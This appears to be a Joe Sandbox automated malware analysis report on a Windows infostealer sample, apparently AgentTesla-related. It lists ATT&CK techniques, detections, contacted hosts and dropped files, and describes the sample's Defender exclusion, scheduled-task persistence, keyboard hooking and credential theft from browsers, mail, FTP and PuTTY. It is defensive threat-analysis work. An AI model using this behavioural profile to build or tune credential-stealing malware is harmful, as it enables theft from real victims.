                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		2
                      Software Packing                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Timestomp                      		NTDS211
                      Security Software Discovery                      		Distributed Component Object Model11
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSH1
                      Clipboard Data                      		23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589087 Sample: kAsh3nmsgs.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 46 smtp.yandex.ru 2->46 48 smtp.yandex.com 2->48 50 api.ipify.org 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus / Scanner detection for submitted sample 2->60 62 8 other signatures 2->62 8 kAsh3nmsgs.exe 7 2->8         started        12 HHhSyZN.exe 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Roaming\HHhSyZN.exe, PE32 8->38 dropped 40 C:\Users\user\...\HHhSyZN.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp4794.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\kAsh3nmsgs.exe.log, ASCII 8->44 dropped 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 kAsh3nmsgs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 HHhSyZN.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 smtp.yandex.ru 77.88.21.158, 49734, 49738, 49979 YANDEXRU Russian Federation 14->52 54 api.ipify.org 104.26.13.205, 443, 49733, 49737 CLOUDFLARENETUS United States 14->54 78 Installs a global keyboard hook 14->78 80 Loading BitLocker PowerShell Module 18->80 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->82 84 Tries to steal Mail credentials (via file / registry access) 24->84 86 Tries to harvest and steal ftp login credentials 24->86 88 Tries to harvest and steal browser information (history, passwords, etc) 24->88 36 conhost.exe 26->36         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      kAsh3nmsgs.exe79%ReversingLabsWin32.Trojan.Jalapeno
                      kAsh3nmsgs.exe61%VirustotalBrowse
                      kAsh3nmsgs.exe100%AviraHEUR/AGEN.1305452
                      kAsh3nmsgs.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\HHhSyZN.exe100%AviraHEUR/AGEN.1305452
                      C:\Users\user\AppData\Roaming\HHhSyZN.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\HHhSyZN.exe79%ReversingLabsWin32.Trojan.Jalapeno

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.gl0%Avira URL Cloudsafe
                      http://crl.gl?0%Avira URL Cloudsafe
                      http://crl.globalsigx0%Avira URL Cloudsafe
                      http://ocsp2.globalsig0%Avira URL Cloudsafe
                      http://crl.g0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      smtp.yandex.ru
                      		77.88.21.158
                      		truefalse
                        		high
                        api.ipify.org
                        		104.26.13.205
                        		truefalse
                          		high
                          smtp.yandex.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bThekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://account.dyn.com/kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4146034790.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers?kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designerskAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.ipify.org/tkAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://smtp.yandex.comkAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003161000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.000000000324F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comlkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.typography.netDkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/cabarga.htmlNkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cThekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.galapagosdesign.com/staff/dennis.htmkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.ipify.orgkAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4146027823.0000000000434000.00000040.00000400.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cnkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.glkAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001376000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crl.gkAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.jiyu-kobo.co.jp/kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ocsp2.globalsigkAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.galapagosdesign.com/DPleasekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers8kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fonts.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.sandoll.co.krkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.urwpp.deDPleasekAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.zhongyicts.com.cnkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekAsh3nmsgs.exe, 00000000.00000002.1730005072.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1769194056.000000000331F000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.sakkal.comkAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.gl?kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://crl.globalsigxHHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          77.88.21.158
                                                                                          		smtp.yandex.ruRussian Federation
                                                                                          		13238YANDEXRUfalse
                                                                                          104.26.13.205
                                                                                          		api.ipify.orgUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1589087
                                                                                          Start date and time:2025-01-11 09:22:31 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 5s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:18
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Sample name:kAsh3nmsgs.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@19/15@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 184
                                                                                          • Number of non-executed functions: 28
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          03:23:23API Interceptor7083842x Sleep call for process: kAsh3nmsgs.exe modified
                                                                                          03:23:25API Interceptor34x Sleep call for process: powershell.exe modified
                                                                                          03:23:28API Interceptor5493875x Sleep call for process: HHhSyZN.exe modified
                                                                                          08:23:25Task SchedulerRun new task: HHhSyZN path: C:\Users\user\AppData\Roaming\HHhSyZN.exe

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          77.88.21.158file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                    DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                              104.26.13.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                              • api.ipify.org/
                                                                                                              lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                              • api.ipify.org/
                                                                                                              Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                              • api.ipify.org/
                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                              • api.ipify.org/
                                                                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                              • api.ipify.org/
                                                                                                              Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                              • api.ipify.org/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              smtp.yandex.rufile.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                              • 77.88.21.158
                                                                                                              DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 77.88.21.158
                                                                                                              0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                              • 77.88.21.158
                                                                                                              api.ipify.orgdhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              • 104.26.13.205
                                                                                                              jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              YANDEXRUhttps://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                              • 77.88.21.119
                                                                                                              http://atozpdfbooks.comGet hashmaliciousUnknownBrowse
                                                                                                              • 77.88.21.119
                                                                                                              http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                              • 77.88.21.119
                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                              • 77.88.21.119
                                                                                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                                                              • 77.88.21.119
                                                                                                              http://www.jmclmedia.phGet hashmaliciousUnknownBrowse
                                                                                                              • 77.88.21.119
                                                                                                              http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                              • 87.250.251.119
                                                                                                              http://thehalobun.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 77.88.21.119
                                                                                                              https://creditunions.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 93.158.134.119
                                                                                                              http://phothockey.chGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                              • 77.88.21.119
                                                                                                              CLOUDFLARENETUS5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.16.1
                                                                                                              bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.21.38.192
                                                                                                              mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.16.1
                                                                                                              xaqnaB0rcW.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.21.54.126
                                                                                                              8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 188.114.97.3
                                                                                                              aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                              • 104.16.185.241
                                                                                                              dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0emnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.26.13.205
                                                                                                              Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                              • 104.26.13.205
                                                                                                              dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.26.13.205
                                                                                                              x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.26.13.205
                                                                                                              lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                              • 104.26.13.205
                                                                                                              JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.26.13.205
                                                                                                              c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.26.13.205
                                                                                                              ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.26.13.205
                                                                                                              grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.26.13.205

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HHhSyZN.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kAsh3nmsgs.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
